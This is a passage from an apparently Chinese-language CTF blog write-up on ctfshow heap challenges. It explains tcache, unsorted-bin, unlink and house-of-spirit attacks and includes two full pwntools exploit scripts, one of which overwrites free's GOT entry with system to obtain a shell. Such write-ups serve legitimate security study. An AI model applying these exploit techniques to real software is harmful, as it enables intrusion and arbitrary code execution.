id=\"ufe98bd88\">\u8fd9\u9898\u8981\u4fee\u6539\u67d0\u4e2a\u4f4d\u7f6e\u5df2\u77e5\u7684\u5168\u5c40\u53d8\u91cf\u7684\u503c\u624d\u80fd\u62ff\u5230flag\u3002\u6f0f\u6d1e\u53ea\u6709edit\u7684\u4efb\u610f\u6ea2\u51fa\u3002<\/p>\n\n\n\n<p id=\"u26a8e480\">\u9996\u5148\u60f3\u5230\u7684\u5f53\u7136\u662f\u4fee\u6539\u67d0\u4e2afree\u6389\u7684\u5757\u7684fd\u6216\u8005bk\u6307\u9488\u6307\u5411\u76ee\u6807\u5730\u5740\uff0c\u7136\u540emalloc\u4e00\u6216\u4e24\u6b21\u5c31\u80fd\u62ff\u5230\u76ee\u6807\u5730\u5740\u7684chunk\uff0c\u8fdb\u800c\u6539\u5199\u3002\u4f46\u662f\u4e4b\u524d\u90fd\u662fUAF\u6765\u505a\uff0c\u8fd9\u91cc\u62d3\u5bbd\u4e86\u601d\u8def\uff0c\u6ea2\u51fa\u4e5f\u80fd\u505a\u3002<\/p>\n\n\n\n<p id=\"u0009a084\">\u5148\u7533\u8bf7\u4e00\u4e2a32B\u7684chunk0\uff0c\u518d\u7533\u8bf7\u4e00\u4e2a32B\u7684chunk1\uff0cfree\u6389chunk1<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/DG6ALC30GSPYJZLQGEK4KW.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" 
decoding=\"async\" width=\"738\" height=\"512\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/DG6ALC30GSPYJZLQGEK4KW.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-252\"  sizes=\"auto, (max-width: 738px) 100vw, 738px\" \/><\/div><\/figure>\n\n\n\n<p id=\"u7675c888\">chunk1\u8fdb\u5165\u4e86tcachebin<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/LWG2GP8@KVGHUOEE.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"755\" height=\"489\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/LWG2GP8@KVGHUOEE.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-253\"  sizes=\"auto, (max-width: 755px) 100vw, 755px\" \/><\/div><\/figure>\n\n\n\n<p id=\"uaa766872\">\u7136\u540e\u901a\u8fc7\u6ea2\u51fa\u6765\u4fee\u6539chunk1\u7684fd\u6307\u9488:<\/p>\n\n\n\n<p id=\"ubf3ae635\">magic=0x6020a0<\/p>\n\n\n\n<p id=\"ufd1950e3\">payload=cyclic(0x20)+p64(0)+p64(0x31)+p64(magic)<\/p>\n\n\n\n<p id=\"ub078c773\">\u624b\u8f93payload\u4f1a\u62a5\u9519\uff0c\u5199\u811a\u672c\u5427<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/WQQXSNZLHM8IQ6XM3.png'><img class=\"lazyload 
lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"749\" height=\"278\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/WQQXSNZLHM8IQ6XM3.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-254\"  sizes=\"auto, (max-width: 749px) 100vw, 749px\" \/><\/div><\/figure>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/EZ_XQOQ9_V@QWZN3Y.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"345\" height=\"95\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/EZ_XQOQ9_V@QWZN3Y.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-255\"  sizes=\"auto, (max-width: 345px) 100vw, 345px\" \/><\/div><\/figure>\n\n\n\n<p id=\"u710316d1\">fd\u6307\u9488\u5df2\u7ecf\u88ab\u4fee\u6539\uff0c\u4f46\u662fbins\u91cc\u9762\u8fd8\u662f\u4e71\u6307<\/p>\n\n\n\n<p 
id=\"u33c75b49\">\u6309\u7406\u6765\u8bf4\uff0c\u4fee\u6539chunk1\u7684fd\u6307\u9488\u540e\u7533\u8bf7\u4e24\u6b21\u5c31\u80fd\u62ff\u5230\u76ee\u6807\u5730\u5740\uff0c\u4f46\u662f\u4e0d\u884c\uff0c\u53ef\u80fd\u662f\u8fd9\u4e2a\u539f\u56e0\uff0c\u6216\u8bb8\u672c\u9898\u7684\u7248\u672c\u538b\u6839\u8fd8\u6ca1\u5f15\u5165tcache bin\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/WYB51RO7FN4KG@JR4X-1024x225.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"225\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/WYB51RO7FN4KG@JR4X-1024x225.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-256\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p id=\"ud0cf2211\">\u90a3\u5c31\u8bd5\u8bd5unsorted bin\u5427\uff0c\u590d\u4e60\u4e00\u4e0b\u5806\u7684\u5206\u914d\u673a\u5236\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/KYU@2C9UD3VND6A-1024x688.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"688\" 
data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/KYU@2C9UD3VND6A-1024x688.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-257\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/OX0A_I03C2_MISUL-1024x388.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"388\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/OX0A_I03C2_MISUL-1024x388.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-258\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p id=\"udd46871a\">\u5b98\u65b9wp\u4e2d\u7684\u6709\u4e9b\u90e8\u5206\u6709\u70b9\u591a\u4f59\uff0c\u8fdb\u884c\u4e86\u4fee\u6539\uff0c\u6700\u7b80\u6d01\u65b9\u5f0f\u5982\u4e0b\uff1a<\/p>\n\n\n\n<p id=\"u1a506299\">\u7533\u8bf7\u4e00\u4e2achunk0 \u4efb\u610f\u5927\u5c0f\uff08\u540e\u9762payload\u6ce8\u610f\u8ddf\u8fdb\u5c31\u884c\uff0c\u6ce8\u610f\u4e00\u4e0b\u5bf9\u9f50\u548cprevsize\u590d\u7528\u673a\u5236\uff09<\/p>\n\n\n\n<p id=\"u50bd887a\">\u4e00\u4e2achunk1 \u5fc5\u987b\u5927\u4e8e0x80(\u5b9e\u6d4b\u5927\u4e8e120\u5373\u53ef\uff0c\u5e94\u8be5\u662f\u5bf9\u9f50\u673a\u5236\uff0c\u53cd\u6b63\u4e0d\u80fd\u653e\u5165fast bin\u5373\u53ef)<\/p>\n\n\n\n<p 
id=\"uc4a3b040\">\u7533\u8bf7\u4e00\u4e2achunk2, \u4efb\u610f\u5927\u5c0f\uff0c\u4f5c\u7528\u662f\u9632\u6b62chunk1\u8ddftop chunk\u5408\u5e76<\/p>\n\n\n\n<p id=\"u87e13f19\">free chunk1\uff0c\u7136\u540eedit chunk0\uff0c\u6ea2\u51fa\u4fee\u6539chunk1\u7684bk\u6307\u9488\uff0c\u518d\u7533\u8bf7\u4e00\u4e2a\u5408\u9002\u5927\u5c0f\u7684chunk\u5c31\u80fd\u62ff\u5230bk\u6307\u9488\u6307\u5411\u7684\u5730\u5740\uff0c\u8fd9\u4e2a\u201c\u5408\u9002\u5927\u5c0f\u201d\u7531edit\u7684payload\u4e2d\u628achunk1\u7684size\u4fee\u6539\u6210\u7684\u503c\u51b3\u5b9a\uff0c\u5982\u679c\u628achunk1\u4fee\u6539\u62100x91,\u5373145\uff0cchunk\u7533\u8bf7\u7684\u503c\u5c31\u5f97\u5bf9\u9f50\u540e\u662f0x80,\u5373128.<\/p>\n\n\n\n<p><\/p>\n\n\n\n<p><\/p>\n\n\n\n<p id=\"u59c861ce\">\u8fd8\u53ef\u4ee5\u7528unlink\u6253\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>from pwn import *\n\n#io = process(\"\/home\/monke\/ctfshowpwn\/pwn\")\n\nio= remote(\"pwn.challenge.ctf.show\",28196)\n\n#chunk0\n\nio.sendlineafter(\"choice :\",b'1')\n\nio.sendlineafter(\"eap : \",b'64')\n\nio.sendlineafter(\"Content of heap:\",b'bbbb')\n\n#chunk1\n\nio.sendlineafter(\"choice :\",b'1')\n\nio.sendlineafter(\"eap : \",b'128')\n\nio.sendlineafter(\"Content of heap:\",b'cccc')\n\n#chunk2\n\nio.sendlineafter(\"choice :\",b'1')\n\nio.sendlineafter(\"eap : \",b'128')\n\nio.sendlineafter(\"Content of heap:\",b'dddd')\n\nptr=0x6020c0\n\nfd=ptr-0x18\n\nbk=ptr-0x10\n\n#fakechunk\n\nfakechunk=p64(0)#prevsize\n\nfakechunk+=p64(0x41) #size\n\nfakechunk+=p64(fd)\n\nfakechunk+=p64(bk)\n\nfakechunk+=b'\\x00'*0x20\n\nfakechunk+=p64(0x40)#chunk1's prevsize,0x40 means chunk0 is 0x40 and in free\n\nfakechunk+=p64(0x90)#chunk1's size\n\n#edit fakechunk\n\nio.sendlineafter(\"choice :\",b'2')\n\nio.sendlineafter(\"Index :\",b'0')\n\nio.sendlineafter(\"eap : \",str(len(fakechunk)))\n\nio.sendlineafter(\"Content of heap : \",fakechunk)\n\n#gdb.attach(io)\n\n#delete chunk1 and chun0 unlink\n\nio.sendlineafter(\"choice 
:\",b'3')\n\nio.sendlineafter(\"Index :\",b'1')\n\nmagic=0x6020a0\n\n#edit ptr chunk0 -&gt;magic\n\npayload=p64(0)*2+p64(0x40)+p64(magic)\n\nio.sendlineafter(\"choice :\",b'2')\n\nio.sendlineafter(\"Index :\",b'0')\n\nio.sendlineafter(\"eap : \",str(len(payload)))\n\nio.sendlineafter(\"Content of heap : \",payload)\n\n#edit magic\n\nio.sendlineafter(\"choice :\",b'2')\n\nio.sendlineafter(\"Index :\",b'0')\n\nio.sendlineafter(\"eap : \",b'32')\n\nio.sendlineafter(\"Content of heap : \",b'eeee')\n\n#gdb.attach(io)\n\nio.sendline(\"114514\")\n\nio.interactive()<\/code><\/pre>\n\n\n\n<p id=\"u310336bc\"><\/p>\n\n\n\n<p id=\"u6d44d64c\">\u8fd8\u53ef\u4ee5\u7528house of spirit\u6253\uff1a<\/p>\n\n\n\n<p id=\"u6984c782\">\u8fd9\u91cc\u6211\u641e\u6e05\u695a\u4e86\uff0c\u6211\u4e00\u5f00\u59cb\u7528tcache bin attack\u6253\u4e0d\u901a\u5e94\u8be5\u662f\u56e0\u4e3a\u5bf9\u5e94\u7248\u672c\u8fd8\u6ca1\u6709tcache bin\uff08\u6240\u4ee5unsorted bin attack\u65f6\u5019\u4e0d\u7528\u8003\u8651\u5148\u628atcache bin\u585e\u6ee1\u4e5f\u80fd\u901a\uff09\uff0c\u6240\u4ee5\u8981\u8003\u8651\u4e5f\u5e94\u8be5\u662ffast bin attack\uff0c\u800cfastbin\u7684\u4f2a\u9020chunk\u662f\u6bd4\u8f83\u82db\u523b\u7684\uff0c\u6709\u68c0\u67e5\uff0c\u6240\u4ee5\u6253\u4e0d\u901a\u3002house of spirit\u5c31\u662ffastbin attack\u7684\u4e00\u79cd\uff0c\u641e\u61c2\u4e86\u8fd9\u4e2a\u5c31\u641e\u61c2\u4e86\u4e3a\u4ec0\u4e48\u6700\u5148\u7684\u90a3\u79cd\u65b9\u6cd5\u901a\u4e0d\u4e86\u3002<\/p>\n\n\n\n<p id=\"uc9e2bf6a\">fastbin\u7684\u68c0\u6d4b\uff1a<\/p>\n\n\n\n<p><a href=\"https:\/\/zhuanlan.zhihu.com\/p\/112858036\">https:\/\/zhuanlan.zhihu.com\/p\/112858036<\/a><\/p>\n\n\n\n<p><a href=\"https:\/\/blog.csdn.net\/qq_41453285\/article\/details\/97753705\">https:\/\/blog.csdn.net\/qq_41453285\/article\/details\/97753705<\/a><\/p>\n\n\n\n<p id=\"udce14843\">\u5c0f\u6280\u5de7\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' 
data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/J85E0EMX2DPYUTYB-1024x340.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"340\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/J85E0EMX2DPYUTYB-1024x340.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-259\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p id=\"u75657cc2\">\u627e\u4e00\u4e2ax7f\u6765\u5f53size\u5c31\u53ef\u4ee5\u9003\u8fc7\u68c0\u6d4b<\/p>\n\n\n\n<p><\/p>\n\n\n\n<p><\/p>\n\n\n\n<p id=\"u4ed6708e\">House Of Spirit<\/p>\n\n\n\n<p id=\"uff513fbe\">\u521b\u5efa\u4e09\u4e2achunk,free chunk2,\u94fe\u5165fastbin,edit\u4fee\u6539chunk1\u5185\u5bb9\uff0c\u5e76\u4e14\u8986\u76d6\u5230free chunk2\u7684fd,fd\u5c31\u53ef<\/p>\n\n\n\n<p id=\"u44b440dd\">\u4ee5\u8986\u76d6\u4e3afake chunk.<\/p>\n\n\n\n<p id=\"ub9e3dcf3\">\u6211\u4eec\u5728heaparray\u9644\u8fd1\u4f2a\u9020chunk,\u4e3a\u4e86\u7ed5\u8fc7free fastbins\u7684\u5927\u5c0f\u68c0\u67e5\uff0c\u5728\u9644\u8fd1\u627e\u52300x7f,\u53ef\u4ee5\u8c03\u8bd5\u627e\u5230\u5408<\/p>\n\n\n\n<p id=\"u29686ad3\">\u9002\u7684\u5730\u65b9\uff1a0x602090 -3\uff0c\u5e76\u628a\u8fd9\u91cc\u4f5cfake chunk,size\u5c31\u662f0x7f.<\/p>\n\n\n\n<p id=\"uf151a066\">\u521b\u5efa\u4e00\u4e2achunk,\u5206\u914d\u5230chunk2<\/p>\n\n\n\n<p id=\"uf47e43ca\">\u518d\u521b\u5efa\u4e00\u4e2achunk3,\u5206\u914d\u5230fakechunk,<\/p>\n\n\n\n<p id=\"u7dd41f28\">edit\u4fee\u6539chunk3,\u8986\u76d6\u5230heaparray\uff0c\u5199\u5165free_got<\/p>\n\n\n\n<p id=\"uc05d3a01\">\u518d\u4fee\u6539heaparray[0],\u628afree_got\u6539\u4e3asystem_plt\u7684\u5730\u5740<\/p>\n\n\n\n<p id=\"u413c3366\">\u8fd9\u91cc\u9700\u8981\u4e00\u4e2a\u2019\/bin\/sh\\x00\u2019\uff0c\u53ef\u4ee5\u5728\u5f00\u59cb\u4fee\u6539chunk1\u7684\u65f6\u5019\u5199\u5165<\/p>\n\n\n\n<p id=\"u8dba3ea5\">\u91ca\u653echunk1,&#8221;\/bin\/sh\\x00&#8243;\u5f53\u4f5c\u53c2\u6570\u4f20\u5165free(),free\u5df2\u6539\u4e3asystem,\u5b9e\u9645\u6267\u884csystem(&#8220;\/bin\/sh\\x00&#8221;)\uff0c<\/p>\n\n\n\n<p id=\"ud67bb4ef\">\u7136\u540eget shell<\/p>\n\n\n\n<p id=\"u921e640d\">exp<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>1 from pwn import *\n\n2 context(arch = 'amd64',os = 'linux',log_level = 'debug')\n\n3 #io = process('.\/pwn')\n\n4 io = remote('pwn.challenge.ctf.show',28227)\n\n5 elf = ELF('.\/pwn')\n\n6 libc = ELF('\/home\/bit\/libc\/64bit\/libc-2.23.so')\n\n7 free_got = elf.got&#91;'free']\n\n8 system = elf.plt&#91;'system']\n\n9 heaparray_0 = 0x6020c0\n\n10 heaparray_1 = 0x6020c8\n\n11 heaparray_2 = 0x6020d0\n\n12 heaparray_3 = 0x6020d8\n\n13\n\n14 def create_heap(size,content):\n\n15 io.recvuntil(\"choice :\")\n\n16 io.sendline(\"1\")\n\n17 io.recvuntil(\":\")18 io.sendline(str(size))\n\n19 io.recvuntil(\":\")\n\n20 io.sendline(content)\n\n21\n\n22 def edit_heap(idx,size,content):\n\n23 io.recvuntil(\"choice :\")\n\n24 io.sendline(\"2\")\n\n25 io.recvuntil(\":\")\n\n26 io.sendline(str(idx))\n\n27 io.recvuntil(\":\")\n\n28 io.sendline(str(size))\n\n29 io.recvuntil(\":\")\n\n30 io.sendline(content)\n\n31\n\n32 def delete_heap(idx):\n\n33 io.recvuntil(\"choice :\")\n\n34 io.sendline(\"3\")\n\n35 io.recvuntil(\":\")\n\n36 io.sendline(str(idx))\n\n37\n\n38 create_heap(0x68,'aaaa')\n\n39 create_heap(0x68,'bbbb')\n\n40 create_heap(0x68,'cccc')\n\n41 delete_heap(2)\n\n42\n\n43 payload = '\/bin\/sh\\x00' + 'a' * 0x60 + p64(0x71) + p64(0x602090-3)\n\n44 edit_heap(1,len(payload),payload)\n\n45 create_heap(0x68,'aaaa')\n\n46 create_heap(0x68,'dddd')\n\n47 payload = 
'\\xaa' * 3 + p64(0) * 4 + p64(free_got)\n\n48 edit_heap(3,len(payload),payload)\n\n49 payload = p64(system)\n\n50\n\n51 edit_heap(0,len(payload),payload)\n\n52 delete_heap(1)\n\n53\n\n54 io.interactive()<\/code><\/pre>\n\n\n\n<p id=\"u3db40b04\"><\/p>\n\n\n\n<p id=\"ud1d4c5dc\">fastbin attack\u8ddfunsorted bin attack \u7ecf\u5e38\u4e00\u8d77\u7528\uff0cunsorted bin\u53ef\u4ee5\u4fee\u6539\u4efb\u610f\u5730\u65b9\u7684\u503c\uff0c\u4fee\u6539\u6210x7f\u5c31\u80fd\u7ed9fastbin attack\u7528\u4e86<\/p>\n\n\n\n<p><\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"pwn_160%EF%BC%88%E5%A0%86%E9%A3%8E%E6%B0%B4%EF%BC%89\"><\/span>pwn 160\uff08\u5806\u98ce\u6c34\uff09<span class=\"ez-toc-section-end\"><\/span><\/h2>\n\n\n\n<p id=\"u9f6f8994\">\u83dc\u5355\u5982\u56fe\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/R_@WQOX5OK_K1XPVRA-1024x872.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"872\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/R_@WQOX5OK_K1XPVRA-1024x872.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-260\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p id=\"uf9896103\">add:<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/2GMY7T27YOXVD8ISE.png'><img 
class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"927\" height=\"555\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/2GMY7T27YOXVD8ISE.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-261\"  sizes=\"auto, (max-width: 927px) 100vw, 927px\" \/><\/div><\/figure>\n\n\n\n<p id=\"ufdcc5ffe\">\u6bcf\u4e00\u6b21add\u4f1a\u8fdb\u884c\u4e24\u6b21malloc\uff0c\u7b2c\u4e00\u6b21\u7528\u6237\u81ea\u5df1\u5b9a\u4e49\u5927\u5c0f\uff0c\u7b2c\u4e8c\u6b21\u7cfb\u7edf\u89c4\u5b9a0x80\uff0c\u7136\u540e\u628a\u7cfb\u7edf\u89c4\u5b9a\u7684chunk\u7684\u5730\u5740\u7684\u503c\u53c8\u89c6\u4e3a\u4e00\u4e2a\u5730\u5740\uff0c\u5e76\u628a\u7528\u6237\u81ea\u5df1\u5b9a\u4e49\u521b\u5efa\u7684chunk\u8d4b\u503c\u7ed9\u5b83\u3002<\/p>\n\n\n\n<p id=\"ua19b3367\">\u7531\u6b64\u53ef\u4ee5\u731c\u51fa\u7ed3\u6784\u4f53\u4e3a\uff1a<\/p>\n\n\n\n<p id=\"u99c737af\">chunk{<\/p>\n\n\n\n<p id=\"ucbfa6928\">*description<\/p>\n\n\n\n<p id=\"uc35197fa\">char[0x7c]<\/p>\n\n\n\n<p id=\"ua0df3a60\">}<\/p>\n\n\n\n<p id=\"u05448d61\">\u5176\u4e2ddescription\u6307\u9488\u6307\u5411\u4e00\u5757\u81ea\u5b9a\u4e49\u5927\u5c0f\u7684chunk\uff0c\u800c\u4e14\u672c\u9898\u662f\u5148\u5f00\u8f9fdescription\u7684chunk\u518d\u5f00\u8f9f\u7ed3\u6784\u4f53\u7684chunk\uff01\u8fd9\u4e00\u70b9\u8ddf\u4e4b\u524d\u9047\u5230\u7684\u9898\u4e0d\u4e00\u6837<\/p>\n\n\n\n<p id=\"u8d20c299\">delete\u51fd\u6570\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' 
